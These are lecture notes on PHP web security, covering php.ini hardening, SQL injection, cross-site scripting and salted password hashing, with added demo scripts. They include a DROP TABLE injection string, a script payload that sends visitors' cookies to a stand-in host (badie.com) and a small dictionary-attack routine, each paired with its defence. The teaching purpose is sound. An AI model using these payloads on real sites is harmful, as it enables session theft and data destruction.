PHP 17
XAMPP Security
• XAMPP isn't designed to be a production server, at least not out of the box: it is configured for convenience on a developer's own machine, not for exposure to the internet.
• Placing the database connection code (host, user name, password) in a separate file in the directory above the web root makes it available to the running script through include/require, but the web server never serves that directory, so outsiders cannot read it.
• [Book p 12-121]
php.ini
safe_mode = on: a PHP script may open only files owned by the same user as the script itself, so one site's scripts cannot read another site's files on a shared host. Note that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4; open_basedir and OS-level user separation replace it.
safe_mode_gid = off: works in combination with safe_mode. When on, the ownership check compares group rather than user, which is looser. Removed together with safe_mode.
open_basedir = directory: a PHP script can open only files under the named directory (or list of directories). This is the directive that actually blocks directory traversal reads such as ../../etc/passwd, and it is still supported.
expose_php = off: prevents PHP from disclosing its version in the X-Powered-By header sent to users.
register_globals = off: when on, GET, POST, cookie and server variables are created automatically as global variables, so an attacker can preset any variable the script forgot to initialise simply by adding it to the query string. Off is the safe value; the setting was removed in PHP 5.4.
display_errors = off: prevents PHP from displaying errors and warnings to the user; the file paths, SQL fragments and stack traces they contain are useful to an attacker. Use this in production and turn it back on only in development.
log_errors = on: errors and warnings are written to a log file (error_log) instead, where they can be reviewed later.
file_uploads = off: most applications don't need to accept file uploads; turn the feature off unless it is required.
SQL Injection Attack
[cartoon by Randall Munroe]
A web form with two fields is submitted with the following values:
Name: John'); DROP TABLE users
Comment:
If the application builds its query by pasting the name into INSERT INTO users (name) VALUES ('...'), the quote and bracket in the input close the application's statement and the attacker's DROP TABLE is executed after it.
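The Name-field payload above, run two ways as an added example (this is not code from the lecture slides or the book): first concatenated into the SQL text, then bound through a PDO prepared statement. It uses an in-memory SQLite database so it runs without MySQL or XAMPP; the table name users and the trailing ";--" that completes the slide's payload are assumptions made for the demonstration.

```php
<?php
// Added example, not from the slides: the Name-field payload against an in-memory
// SQLite database through PDO, so it needs no MySQL/XAMPP install.

function openDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    return $db;
}

function tableExists(PDO $db, string $table): bool
{
    $stmt = $db->prepare("SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = :t");
    $stmt->execute([':t' => $table]);
    return (int) $stmt->fetchColumn() > 0;
}

// The slide's payload, completed with the usual ";--" so that whatever the application
// appends after the injected text is commented out instead of causing a syntax error.
$name = "John'); DROP TABLE users; --";

// 1. Vulnerable: the input is pasted into the SQL text. The string sent to the database is
//    INSERT INTO users (name) VALUES ('John'); DROP TABLE users; --')
//    PDO::exec() on the SQLite driver runs every statement it is given, so the table is dropped.
$db = openDb();
try {
    $db->exec("INSERT INTO users (name) VALUES ('" . $name . "')");
} catch (PDOException $e) {
    echo 'query failed: ', $e->getMessage(), "\n";
}
echo 'concatenated query - users table still exists: ', tableExists($db, 'users') ? 'yes' : 'no', "\n";

// 2. Safe: a prepared statement. The SQL is parsed with a placeholder first; the value is
//    bound afterwards and is only ever treated as data, whatever quotes or semicolons it holds.
$db = openDb();
$stmt = $db->prepare('INSERT INTO users (name) VALUES (:name)');
$stmt->execute([':name' => $name]);
echo 'prepared statement  - users table still exists: ', tableExists($db, 'users') ? 'yes' : 'no', "\n";
echo 'stored name: ', $db->query('SELECT name FROM users')->fetchColumn(), "\n";
```

Run it with php from the command line. Whether a database driver accepts several statements in one call varies, but injections that stay inside a single statement (a classic login bypass such as ' OR '1'='1) work regardless of that, and the prepared statement defends against both, which is why parameter binding rather than escaping is the fix.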
Script as Data
Cross-site scripting: script is submitted where data (a name) is expected, stored, and then sent to every browser that views the page, which runs it in the context of the site.
Name: <script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>
A page that echoes the name without encoding then delivers the attacker's script, which sends each visitor's cookies to badie.com:
<html>
<body>
Welcome Mr.<script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>
</body>
</html>
Sanitising Inputs
Much as we might check an input to see if it conforms to the expected format (a phone number, say), we can check inputs to ensure there is nothing malicious in them. Decide what each field may legitimately contain and reject the rest:
• numbers
• letters
• tags, such as <script>: never legitimate in a name or a phone number
• ' (apostrophe): legitimate in names such as O'Conor, so it cannot simply be banned
• brackets
• - (hyphen): legitimate in names such as Jean-Luc
Because the characters that matter to SQL and HTML also occur in real data, validation narrows the attack surface but is not the fix on its own; parameterised queries and output encoding are.
Sanitising Inputs
• Where data is to be output inside HTML, all special characters (<, >, &, quotes) should be converted to their HTML entities (htmlspecialchars() in PHP) so the browser treats them as text rather than markup.
• If some HTML genuinely has to be allowed in a field, entity conversion cannot be used for that field; it needs an allow-list HTML sanitiser instead.
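An added example, not from the slides or the book, covering both the validation checklist and the entity-conversion rule above: an allow-list check for a name field that still accepts O'Conor and Jean-Luc, and the "Welcome Mr." page from the Script as Data slide rendered both with and without encoding. The 60-character limit and the function names are assumptions for the demonstration.

```php
<?php
// Added example, not from the slides: allow-list validation that still accepts
// O'Conor and Jean-Luc, plus output encoding for the "Welcome Mr." page.

function isValidName(string $name): bool
{
    // Letters in any script, spaces, apostrophes and hyphens, 1 to 60 characters.
    // Digits, angle brackets, quotes and semicolons are simply not in the set.
    return preg_match('/^[\p{L}\' -]{1,60}$/u', $name) === 1;
}

function greetUnsafe(string $name): string
{
    // Vulnerable: the input is echoed straight into the markup, so a <script>
    // element in the name becomes part of the page and runs in the visitor's browser.
    return '<html><body>Welcome Mr. ' . $name . '</body></html>';
}

function greetSafe(string $name): string
{
    // HTML body context: & < > " ' become entities, so the browser shows the
    // payload as visible text and never creates a script element from it.
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<html><body>Welcome Mr. ' . $escaped . '</body></html>';
}

// The Name-field payload from the Script as Data slide.
$payload = "<script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>";

// Legitimate names pass the allow-list; the payload and an SQL-style input do not.
foreach (["O'Conor", "Jean-Luc", "John'); DROP TABLE users", $payload] as $input) {
    echo str_pad(isValidName($input) ? 'accepted' : 'rejected', 9), ' ', $input, "\n";
}

// Defence in depth: a free-text comment field cannot be restricted to letters, so
// encoding on output is what stops the payload when validation has to let it through.
echo greetUnsafe($payload), "\n";
echo greetSafe($payload), "\n";
```

htmlspecialchars() is correct for text between tags and, with ENT_QUOTES, for quoted attribute values; data placed inside a JavaScript block or a URL needs the encoding for that context instead. Marking the session cookie HttpOnly also stops document.cookie from reading it, which limits what this particular payload can steal even if the script does run.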
• If a password table stored in plain text is compromised, every account in it is exposed at once, and any user who reuses the same password elsewhere is insecure there too.
YAHOO.COM
e-mail                  password
colin.manning@cit.ie    bananaskins
dan.murphy@gmail.com    dantheman
peter@ge.com            pengineer
joe.smith@gmail.com     password
Hash Function
• A hash function maps data of an arbitrary size to data of a fixed size
• The data from the arbitrarily large set is known as the key
• A cryptographic hash function is one way: the key cannot be recovered from the hash value
DA1 Hash Function (toy example): bananaskins -> sniksananab
(reversing the string is trivially invertible and its output is as long as the input, so it is not a usable hash)
DA2 Hash Function (toy example): bananaskins -> 147
YAHOO.COM: joe.smith@gmail.com -> 862
Securing Passwords
YAHOO.COM
e-mail                  password_hash
colin.manning@cit.ie    147
dan.murphy@gmail.com    936
peter@ge.com            954
joe.smith@gmail.com     862
Only the hash is stored. At login the submitted password is hashed the same way and compared; someone who steals the table sees 147, not bananaskins.
DA2 Hash Function (toy example): bananaskins -> 147
MD2 Hash Function (128-bit digest): bananaskins -> 1f73cc189528669e51aa4b851764c6c2
Whirlpool Hash Function (512-bit digest): bananaskins ->
0557ab10f7fb8ce53af2af7238ae245bbc62d3629d83263879839ea87faa8f456d1c9586b87374a5ccc54d752fc65a49fa228e76eed782b896e4629ee8dba4c0
• The hash value provides no insight into the value of the key, whatever the length of the digest
Hash Function Vulnerabilities
• A dictionary attack runs through a list of words (and previously leaked passwords), hashes each one, and compares the results with the stored hash values. Every user whose password is in the list is recovered in one pass, and identical passwords are visible as identical hashes before any guessing starts.
• Fast general-purpose hashes such as MD2 or MD5 make this cheap, which is why dedicated password hashes (bcrypt, scrypt, Argon2) are deliberately slow.
Salting the Hash Function
• Adding a salt (a random string) to the key before it is sent to the hash function makes the system more secure: the same password no longer produces the same hash for two users, and a dictionary of precomputed hashes is useless against the table.
• Salt: Q6d&7Xp1
• MD2 Hash Function: bananaskins -> 1f73cc189528669e51aa4b851764c6c2
• The salt is added to the key before sending it to the hash function: Q6d&7Xp1bananaskins -> b2e9ae6ca1f9d07f438918da82af8615
• The salt is not secret; it is stored alongside the hash so the same computation can be repeated at login. Use a different random salt for every user.
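An added example, not from the slides or the book, covering the plaintext table, the dictionary attack and salting together: the same address book hashed without a salt, a constructed wordlist run against it, the slide's salt-then-hash construction with a random per-user salt, and finally PHP's built-in password_hash()/password_verify(), which is what real code should use. The extra account eve@example.com, the wordlist and the use of MD5 in place of the slide's MD2 are assumptions for the demonstration; the slide's specific digests are not reproduced.

```php
<?php
// Added example, not from the slides: unsalted vs salted hashing and PHP's password API.

// The address book from the slides, plus one constructed account that reuses a password.
$users = [
    'colin.manning@cit.ie' => 'bananaskins',
    'dan.murphy@gmail.com' => 'dantheman',
    'peter@ge.com'         => 'pengineer',
    'joe.smith@gmail.com'  => 'password',
    'eve@example.com'      => 'password',   // constructed for the example
];

// 1. Unsalted fast hash, as in the password_hash table: one digest per distinct password,
//    so two users with the same password are visible before any cracking is done.
$unsalted = array_map(fn(string $pw): string => hash('md5', $pw), $users);
echo 'joe and eve share a digest: ',
    $unsalted['joe.smith@gmail.com'] === $unsalted['eve@example.com'] ? 'yes' : 'no', "\n";

// 2. Dictionary attack: hash the wordlist once, then look every stored digest up in it.
//    The wordlist is constructed for the example.
$wordlist = ['letmein', 'password', 'qwerty', 'bananaskins', 'dantheman'];
$lookup = [];
foreach ($wordlist as $word) {
    $lookup[hash('md5', $word)] = $word;
}
foreach ($unsalted as $email => $digest) {
    echo $email, ': ', $lookup[$digest] ?? '(not in wordlist)', "\n";
}

// 3. Salting by hand, as on the slide (salt . key), with a random per-user salt stored in
//    the clear next to the hash. The wordlist now has to be re-hashed once per user, and
//    equal passwords no longer give equal digests.
function saltedMd5(string $password, ?string $salt = null): array
{
    $salt = $salt ?? bin2hex(random_bytes(8));   // 16 hex characters, fresh for each user
    return ['salt' => $salt, 'hash' => hash('md5', $salt . $password)];
}
$joe = saltedMd5('password');
$eve = saltedMd5('password');
echo 'salted digests for the same password equal: ', $joe['hash'] === $eve['hash'] ? 'yes' : 'no', "\n";
echo 'joe verifies with his stored salt: ',
    saltedMd5('password', $joe['salt'])['hash'] === $joe['hash'] ? 'yes' : 'no', "\n";

// 4. What to use in real code: password_hash() picks a random salt, uses a deliberately
//    slow algorithm (bcrypt for PASSWORD_DEFAULT) and records algorithm, cost and salt in
//    the returned string, so password_verify() needs nothing else to check a login.
$stored = password_hash('bananaskins', PASSWORD_DEFAULT);
echo 'stored: ', $stored, "\n";
echo 'correct password verifies: ', password_verify('bananaskins', $stored) ? 'yes' : 'no', "\n";
echo 'wrong password verifies:   ', password_verify('bananaskin', $stored) ? 'yes' : 'no', "\n";
```

Step 3 shows the slide's construction with a real salt; it still uses a fast hash, so it stops precomputation but not a determined per-user guessing run. Step 4 is the form to ship: store the whole string password_hash() returns in the password column and never the plain text.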
Other Uses of Hash Functions
• Data Storage (hash tables and indexes, locating a record by the hash of its key)
• Cryptography (message authentication codes, digital signatures, integrity checks)
• Block-chain (each block carries the hash of the previous one, so altering history changes every later hash)
• https://www.wired.com/2016/05/hacker-lexicon-sql-injections-everyday-hackers-favorite-attack/
• https://arstechnica.com/information-technology/2012/08/passwords-under-assault/
• https://arstechnica.com/information-technology/2013/03/how-i-became-a-password-cracker/